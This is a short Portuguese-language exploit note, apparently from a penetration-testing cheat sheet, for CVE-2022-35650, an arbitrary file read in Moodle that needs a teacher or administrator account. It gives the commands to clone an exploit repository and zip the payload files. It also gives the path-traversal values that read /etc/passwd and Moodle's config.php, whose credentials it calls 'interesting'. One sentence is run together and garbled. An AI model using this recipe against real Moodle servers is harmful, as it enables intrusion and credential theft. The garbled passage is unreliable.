
Exploit para CVE-2022-35650, uma leitura arbitrária de arquivos no Moodle.
Esta é uma leitura arbitrária de arquivos no Moodle.
Você deve ter comprometido um usuário de nível professor ou administrador.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) é baixado/etc/passwdSe você quiser ler o arquivo de configuração (com credenciais interessantes), defina seu baseurl em imsmanifest.xml para:
../../../../../../../../../../../var/www/html
e o src da sua img em pool.dat para:
muc/config.php